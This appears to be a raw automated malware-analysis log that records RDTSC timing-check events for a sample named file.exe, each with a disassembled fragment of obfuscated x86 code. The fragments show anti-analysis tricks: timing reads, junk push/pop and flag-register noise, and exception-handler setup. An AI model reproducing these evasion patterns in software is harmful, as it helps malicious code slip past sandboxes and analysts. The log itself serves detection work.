Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262821 second address: 1262832 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEDA531E8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262832 second address: 1262836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262836 second address: 126283C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126283C second address: 1262846 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEDA51D0EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266DF3 second address: 1266E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FEDA531E8C8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2F10h], ebx 0x0000002c xor edx, dword ptr [ebp+1249562Ch] 0x00000032 push 00000004h 0x00000034 mov dword ptr [ebp+122D1E4Ch], esi 0x0000003a call 00007FEDA531E8C9h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007FEDA531E8CEh 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266E62 second address: 1266E79 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FEDA51D0EBCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266E79 second address: 1266E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126719D second address: 12671A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12671A3 second address: 12671A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12671A7 second address: 12671DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jng 00007FEDA51D0EBCh 0x00000016 jc 00007FEDA51D0EB6h 0x0000001c je 00007FEDA51D0EB8h 0x00000022 push eax 0x00000023 pop eax 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12671DB second address: 12671DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12671DF second address: 12671F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126A686 second address: 126A694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEDA531E8C6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B422 second address: 117B458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FEDA51D0EC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B76B second address: 117B78D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B78D second address: 117B793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B793 second address: 117B7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48B03A8 second address: 48B03DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEDA51D0EC0h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 mov di, cx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48B03DD second address: 48B042A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEDA531E8D1h 0x00000009 xor si, 8126h 0x0000000e jmp 00007FEDA531E8D1h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FEDA531E8D6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48B042A second address: 48B0463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007FEDA51D0EBDh 0x0000000b or cl, FFFFFFE6h 0x0000000e jmp 00007FEDA51D0EC1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ecx, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov di, BE6Eh 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48B04BE second address: 48B04C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E05CE second address: 48E0604 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 26h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007FEDA51D0EBFh 0x00000010 pop eax 0x00000011 call 00007FEDA51D0EC9h 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0604 second address: 48E065E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007FEDA531E8D0h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FEDA531E8D0h 0x00000017 push eax 0x00000018 jmp 00007FEDA531E8CBh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEDA531E8D5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E065E second address: 48E0697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bl, 3Fh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-04h] 0x0000000d jmp 00007FEDA51D0EC4h 0x00000012 nop 0x00000013 jmp 00007FEDA51D0EC0h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0697 second address: 48E069D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E069D second address: 48E06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EC2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E07A3 second address: 48E07AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E07AA second address: 48E07E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a call 00007FEDA51D0EBDh 0x0000000f jmp 00007FEDA51D0EC0h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007FEDA51D0EC1h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E07E6 second address: 48E0832 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEDA531E8D1h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d mov bl, 05h 0x0000000f jmp 00007FEDA531E8D6h 0x00000014 popad 0x00000015 leave 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEDA531E8D7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0832 second address: 48E0838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0838 second address: 48E083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E083C second address: 48D001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007FEDA51D0EB7h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007FEDA8AEA2F3h 0x00000031 mov edi, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 jmp 00007FEDA51D0EC3h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D001B second address: 48D00C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e mov si, C4EFh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEDA531E8CBh 0x0000001b add eax, 6B6D367Eh 0x00000021 jmp 00007FEDA531E8D9h 0x00000026 popfd 0x00000027 push ecx 0x00000028 movsx edi, cx 0x0000002b pop ecx 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FEDA531E8D5h 0x00000035 or cx, 7B66h 0x0000003a jmp 00007FEDA531E8D1h 0x0000003f popfd 0x00000040 mov ecx, 083CAF97h 0x00000045 popad 0x00000046 mov ebp, esp 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FEDA531E8D9h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D00C8 second address: 48D00F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FEDA51D0EBEh 0x00000010 push 1C639C33h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 movsx edx, cx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D00F8 second address: 48D0118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, si 0x00000009 popad 0x0000000a xor dword ptr [esp], 69A5027Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEDA531E8CDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0118 second address: 48D0128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0128 second address: 48D0148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FEDA531E8C9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0148 second address: 48D014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D014C second address: 48D0152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0152 second address: 48D016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEDA51D0EBEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D016E second address: 48D0195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 jmp 00007FEDA531E8CAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEDA531E8CEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0195 second address: 48D019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D019B second address: 48D01D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FEDA531E8D8h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEDA531E8CEh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D01D1 second address: 48D01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEDA51D0EC5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D01F8 second address: 48D022E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ch, 95h 0x00000013 call 00007FEDA531E8CFh 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov di, 250Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D022E second address: 48D02F5 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 nop 0x00000009 jmp 00007FEDA51D0EBAh 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEDA51D0EC1h 0x00000016 or cx, A936h 0x0000001b jmp 00007FEDA51D0EC1h 0x00000020 popfd 0x00000021 movzx esi, di 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007FEDA51D0EC3h 0x0000002b sub esp, 18h 0x0000002e jmp 00007FEDA51D0EC6h 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FEDA51D0EBEh 0x0000003b sbb ecx, 392361E8h 0x00000041 jmp 00007FEDA51D0EBBh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FEDA51D0EC8h 0x0000004d and eax, 0255F448h 0x00000053 jmp 00007FEDA51D0EBBh 0x00000058 popfd 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e mov ebx, esi 0x00000060 push esi 0x00000061 pop edi 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D02F5 second address: 48D033A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov esi, 28F4A0BBh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FEDA531E8CEh 0x00000018 jmp 00007FEDA531E8D5h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D033A second address: 48D038F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FEDA51D0EBAh 0x0000000f or cx, CB68h 0x00000014 jmp 00007FEDA51D0EBBh 0x00000019 popfd 0x0000001a push eax 0x0000001b jmp 00007FEDA51D0EBFh 0x00000020 pop ecx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FEDA51D0EC6h 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D038F second address: 48D0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0393 second address: 48D0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0399 second address: 48D039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D039F second address: 48D03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D03A3 second address: 48D0428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FEDA531E8D0h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edi, 4E778F34h 0x00000018 movsx ebx, si 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e call 00007FEDA531E8D2h 0x00000023 mov ecx, 5AF46701h 0x00000028 pop esi 0x00000029 mov edi, 29806A32h 0x0000002e popad 0x0000002f mov eax, dword ptr [75C74538h] 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007FEDA531E8D5h 0x0000003d sub ax, A306h 0x00000042 jmp 00007FEDA531E8D1h 0x00000047 popfd 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0428 second address: 48D042C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D042C second address: 48D0440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 40A7BD8Dh 0x0000000b popad 0x0000000c xor dword ptr [ebp-08h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0440 second address: 48D0447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0447 second address: 48D0472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 jmp 00007FEDA531E8D9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ah, 52h 0x00000014 mov cl, dl 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0472 second address: 48D0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0478 second address: 48D047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D047C second address: 48D04A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04A2 second address: 48D04B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04B5 second address: 48D0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEDA51D0EC1h 0x0000000f nop 0x00000010 pushad 0x00000011 movzx ecx, dx 0x00000014 push edx 0x00000015 mov dx, cx 0x00000018 pop eax 0x00000019 popad 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d jmp 00007FEDA51D0EC7h 0x00000022 mov dword ptr fs:[00000000h], eax 0x00000028 pushad 0x00000029 mov dx, ax 0x0000002c mov edx, ecx 0x0000002e popad 0x0000002f mov dword ptr [ebp-18h], esp 0x00000032 pushad 0x00000033 jmp 00007FEDA51D0EC8h 0x00000038 pushfd 0x00000039 jmp 00007FEDA51D0EC2h 0x0000003e and esi, 248F2578h 0x00000044 jmp 00007FEDA51D0EBBh 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr fs:[00000018h] 0x00000051 pushad 0x00000052 mov di, cx 0x00000055 mov dl, cl 0x00000057 popad 0x00000058 mov ecx, dword ptr [eax+00000FDCh] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FEDA51D0EC6h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0583 second address: 48D0589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0589 second address: 48D05D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, ecx 0x0000000d jmp 00007FEDA51D0EBEh 0x00000012 jns 00007FEDA51D0EFCh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FEDA51D0EBCh 0x00000021 add esi, 34B00498h 0x00000027 jmp 00007FEDA51D0EBBh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03A1 second address: 48C03DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f pushfd 0x00000010 jmp 00007FEDA531E8D2h 0x00000015 add si, B5D8h 0x0000001a jmp 00007FEDA531E8CBh 0x0000001f popfd 0x00000020 popad 0x00000021 popad 0x00000022 sub esp, 2Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03DF second address: 48C03ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03ED second address: 48C0448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEDA531E8D1h 0x00000008 pushfd 0x00000009 jmp 00007FEDA531E8D0h 0x0000000e sub eax, 26D3FA98h 0x00000014 jmp 00007FEDA531E8CBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FEDA531E8D6h 0x00000023 push eax 0x00000024 pushad 0x00000025 mov edi, 07F718A4h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0448 second address: 48C045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov bx, 3772h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
